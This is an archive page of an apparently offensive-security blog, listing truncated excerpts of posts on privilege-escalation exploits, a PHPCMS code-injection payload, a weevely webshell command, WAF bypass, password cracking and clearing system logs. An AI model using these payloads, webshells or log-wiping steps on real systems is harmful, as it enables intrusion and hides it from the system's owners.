Menu

Monthly Archives: June 2015

windows提权exploit补丁对照表
2003 systeminfo>a.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 [...]
内网转发工具———-tunna
他的原理就是个HTTP tunneling工具。 +——————————————-+ [...]
2.6.18-194 exploit
废话不多说,直接上exploit x64编译好的下载地址: 2.6.18-194   以下是源码:   /* Ac1dB1tch3z Vs Linux Kernel x86_64 0day Today is a sad day.. R.I.P. Tue, 29 Apr 2008  /  [...]
PHPCMS_V9之authkey注入漏洞
在乌云上的某一个漏洞 PHPCMS最新版本authkey泄露可注射拿shell 但是他没有给出利用的方法,如何利用authkey 我有朋友写出了该漏洞的exp 比较鸡肋,成功率不高,不过还是分享给大家。 利用方式 : 首先你得有php的环境并且启动curl_init()函数 php [...]
PHPCMS_v9之投票漏洞
废话不多说,直接上EXP EXP http://www.XXXXX.com.cn/index.php?m=vote&c=index&a=post&subjectid=1 post: subjectid=1&radio[]=);phpinfo();%80 或者 [...]
SQLMAP 防火墙的绕过与过滤
[为0x00] – 简介 [0X01] – 过滤闪避(MySQL的) [0x01a] – 旁路功能和关键字过滤 [0x01b] – 绕过正则表达式过滤 [0X02] – 通常情况下旁路技术 [0X03] – 高级旁路技术 [0x03a] [...]
CVE-2014-0196 Linux kernel <= v3.15-rc4
/* * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race * condition * * Slightly-less-than-POC privilege escalation exploit * For [...]
用Python写生成一个简单的字典
不多说,直接上代码   #! /usr/bin/env python #coding=utf-8 f=open(“zd.txt”,’w’) chars=[ [...]
如何破解Linux密码———–John
John the Ripper password cracker, ver: 1.7.9-jumbo-7_omp [linux-x86-64] Copyright (c) 1996-2012 by Solar Designer and others Homepage: [...]
Linux下的爆破神器————-HYDRA
# hydra [-L FILE] [-p PASS | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R [...]
Linux 系统日志查看与分析
Unix系统日志文件通常是存放在 “/var/log and /var/adm” 目录下的。通常我们可以查看syslog.conf来看看日志配置的情况.如:cat /etc/syslog.conf 一般我们要清除的日志有 lastlog utmp wtmp messages [...]
Nmap 详细介绍(2)
0x00:说明 只是一个快速查询手册,理论的东西都没有补充,欢迎大家积极在评论区补充自己常用的参数,O(∩_∩)O 0x01:nmap功能介绍 1.主机存活检测 2.端口探测 3.服务识别 4.操作系统识别 5.硬件地址检测 6.服务版本识别 7.漏洞扫描,使用nmap自带脚本 0x02:简单示例 [...]
Nmap 详细介绍(1)
ubuntu apt-get install nmap 工具介绍:NMap是Linux下的网络扫描和嗅探工具包。可以帮助网管人员深入探测UDP 或者TCP端口,直至主机所使用的操作系统;还可以将所有 探测结果记录到各种格式的日志中,为系统安全服务。NMap,也就是Network [...]
Nginx配置文件详解
Nginx配置文件详细说明 在此记录下Nginx服务器nginx.conf的配置文件说明, 部分注释收集与网络. #运行用户 user www-data; #启动进程,通常设置成和cpu的数量相等 worker_processes 1; #全局错误日志及PID文件 error_log [...]
Linux下自带的“菜刀”———-weevely
weevel generate warden /root/warden.php [...]
Linux发行版本号及内核版本号对照表
为了方便用EXP提权。 Redhat 9.0———————————————2.4.20-8 RHEL 3 Update 8————————————2.4.21-47 RHEL 4 ————————————————2.6.9-5 RHEL 4 Update 1————————————2.6.9-11 RHEL [...]